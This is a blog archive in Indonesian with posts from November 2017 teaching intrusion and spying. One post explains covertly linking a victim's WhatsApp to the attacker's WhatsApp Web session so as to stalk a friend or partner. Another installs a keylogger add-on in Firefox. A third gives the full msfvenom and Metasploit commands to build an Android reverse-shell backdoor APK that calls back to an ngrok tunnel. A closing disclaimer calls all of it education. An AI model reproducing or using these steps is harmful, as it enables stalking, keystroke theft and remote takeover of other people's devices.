Rabu, 29 November 2017

Cara Menyadap WhatsApp Via Soceng

Posting lagi lah, gw mau sharing buat kalian yang mau stalking lebih jauh ke temen, pacar atau siapa aja lah, yang penting si victim punya WA, iyalah, kalo gk punya apa yang mau di sadap, kwkwkwkwkwk.

Di WA itu ada fitur WhatsApp Web, nah ini bisa dimanfaatkan untuk sadap menyadap. Fitur ini juga bisa dibilang BUG, kenapa? karena di whatsapp membolehkan lebih dari satu perangkat untuk mengakses via web dengan satu nomor yang sama, dan parahnya lagi otentikasinya hanya QR Code doang, gak minta username, email atau pasword gituh.

Kita gak pake tools apapun, hanya pakai otak dan sedikit soceng.
Satu tips nih buat soceng, yang penting itu PD aja udah, selama PD mah aman..

Ok, kita next ke caranya aja yah, gampang banget kok.

Pertama kita siapkan device kita (PC/HP) untuk media socengny

Siapkan device kita, buka WhatsApp Web jangan ditutup.




Kalo device kita android, pasang google chrome  pada device kita, kemudian setting chrome agar bisa membuka WhatsApp Web menampilkan tampilan desktop.
Caranya klik titik tiga di pojok kanan atas pada chrome, kemudian ceklis pada ubah situs desktop. 






Kemudian akses WhatsApp Web sama seperti di PC/Laptop



Time to soceng, nah sekarang saatnya kita soceng.
Pinjam perangkat victim dengan alasan apapun, mikir aja sendiri agar dibolehkan pinjem HPnya. Kalo udah dapet HP victim, masuk apliksai WA dan klik titik tiga di pojok kanan atas, pilih WhatsApp Web (sorry gambar gk gw ss, males ngedit) kemudian buru" deh scan QR Code yang telah kita siapkan tadi



daaaaannnnn eng.. ing.. eng..
Sorry, HP gua HP Game Boat soalnya, jadi kameranya suram wkwkkw

Kalo mau bertanya, komen, kritik dan saran, PM facebook gw aja, you know lah


Thanks 

NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami

Baca Juga :



Selasa, 28 November 2017

Cara Memasang Keylogger Untuk Firefox

Weeeh, posting lagi, kali ini gw mau share  cara pasang keylogger di firefox. Untuk melakukan trik ini kalian hanya berani buat soceng. Sebelumnya kalian tau gak key logger itu apa ? Keylogger adalah sebuah program yang dibuat untuk merekam atau mencatat penekanan tombol melalui keyboard dan memasukanya ke dalam log (catatan), ya kira-kira gitu lah.

Tools ini merupakan plugin Add-ons firefox, jdi gampang banget buat install dan pakainya

Ok next aja yah.

Kunjungi link berikut ini.



Pilih +add firefox, setelah di klik nongol pop-up add-ons di pojok kiri atas



Kemudian klik install, tunggu proses kemudian restart firefoxnya.

Udah deh kepasang, kalo mau ngecek kepasang atau belum, bisa di cek di add-ons firefoxnya, you know lah.

Nah untuk liat lognya gimana ?, tenang ! gampang banget kok, kalian hanya harus menekan shortcut Ctrl + Alt + K



Nah keliatan deh log keyboardnya wkwkwkwk

Kalo mau hapus kita bisa akses file kltext.txt di direktori ini nih

/root/.mozilla/firefox/v58gvx27.default/kltext.txt

Gampang bangetkan.?



NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami

Sabtu, 25 November 2017

Backdoor Beda Jaringan Metasploit + Ngrok

Kali ini gw bakal share Cara Membuat RAT Beda Jaringan. Kalian pada tau gak RAT itu apaan ? Setau gw sih ya, RAT adalah kata singkatan dari Remote Administration Tool, atau disebut juga sebagai Remote Access Trojan. Bener gak?
Asudahlah...

Sebelumnya baca juga nih
Biar sedikit paham lah, wkwkwk.. Ok next ya, 

Bahan

 - Kali OS
 - Metasploit
 - Ngrok
 - Internet 

Lanjutkan

kita setting port forward dulu, buka terminal dan ketikan perintah berikut.
 
  #echo 1 > /proc/sys/net/ipv4/ip_forward


Jika sudah, kita siapkan port yang mau di pakai (bebas) dan buka ngroknya, gw pakai yang 4455, tapi sebelumnya kita install dulu authtoken ngroknya. Caranya masuk ke sini, login dan copy authtokennya 




 Kemudian install, ketik perintah ini di terminal


    #./ngrok authtoken xxxxxxxx


Nah nanti authtoken akan terinstall di /root/.ngrok2/ngrok.yml , kalo udah gini baru kita forward portnya, perintahnya
 
  #./ngrok tcp 4455

 
Kalo buat backdoor kan kita pakai reverse tcp ip,  jd yg diforward servicenya adalah tcp. Kita buat payloadnya, kalo windows ya silahkan inject untuk windows, kalo disini gw mau bikin payload buat android

#msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=17509 R > Backdoor.apk


Buka metasploit dengan perintah ini

  #msfconsole


Dan reverse_tcp attack deh, perintahnya ini dibawah
  
   #use exploit/multi/handler
  
  #set payload android/meterpreter/reverse_tcp

  #set lhost 0.tcp.ngrok.io


  #set lport 4455

  
  #exploit








Gampang kan? oh iya, kalo misalkan exploit sukses, tpi session meterpreternya run di background kalian tinggal ketik ini diperintah terminal metasploitnya

  #sessions -l


Nah nanti muncul id sessions yang aktif, tinggal ketik aja ini

   #sessions -i (id)


Ya gitulah kira-kira, kalo udah dapet sessionnya eksekusi deh..


NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaan di luar tanggung jawab kami

    

Port Forwarding Dengan Ngrok di Kali Linux OS



 Kali ini gw bakal share cara forwarding port menggunakan ngrok, sebelumnya gw kasih tau nih apa itu port forwarding. Port forwarding adalah sebuah pengaplikasian dari Network Address Translation (NAT) yang meneruskan permintaan komunikasi berasal dari 1 ip address dengan kombinasi port komunikasi ke ip address dan port komunikasi yang lain sesuai rules yang dibuat. Gampangnya sih 2 Ip beda jaringan saling terhubung dengan port yang sama. Kalo ngrok itu proxy server untuk membuat / membuka jaringan private melalui NAT atau firewall untuk menghubungkan localhost ke internet dengan tunnel yang aman.

Bahan :

Download Ngrok disini.

Next :

Download dan ekstrak ngroknya
  
  #unzip ngrok-stable-linux-amd64.zip

Setting permissionsnya 
  
  #chmod +x ngrok

Next kita install authoken code dari ngroknya, silahkan login dengan akun kaian 

  #./ngrok authtoken code_authoken



Selanjutnya copy ngrok ke direktori /usr/bin
  
  #cp ngrok /usr/bin

Nah jalankan ngrok sudah bisa dipakai, untuk lihat perintahnya ketikan perintah berikut
  
  #./ngrok --help

Kita ambil contoh forwarding port http: 8, caranya ? tenang, sebelumnya harus kita aktifkan dulu apache / web servernya ketikan perintah berikut
  
  #service apache2 start
  #./ngrok http 80



Nah muncul tuh link https://0aca7ce4.ngrok.io, coba kalian akses, maka server local kalian akan terforward deh



Gampangkan.?
 
NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami

Kamis, 23 November 2017

Cara Clone Mac Address Dengan Tylemac

Postingan pertama ini gw bakal share cara ubah mac address menggunakan tylemac. Tools ini bisa kalian clone di github, tool ini modifikasi, sorry gw kiddies gk terlalu mahir coding.

Bahan:

clone dari sini

Caranya :

1. Clone atau download
    #git clone (link)

2. Masuk folder tylemac
    #cd  tylemac

3. Ubah hak aksesnya
    #chmod +x tylemac.sh

4. Jalankan toolsnya
    #./tylemac.sh

5. Next ikuti perintahnya







Gambar pahami sendiri lah

terima kasih


NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami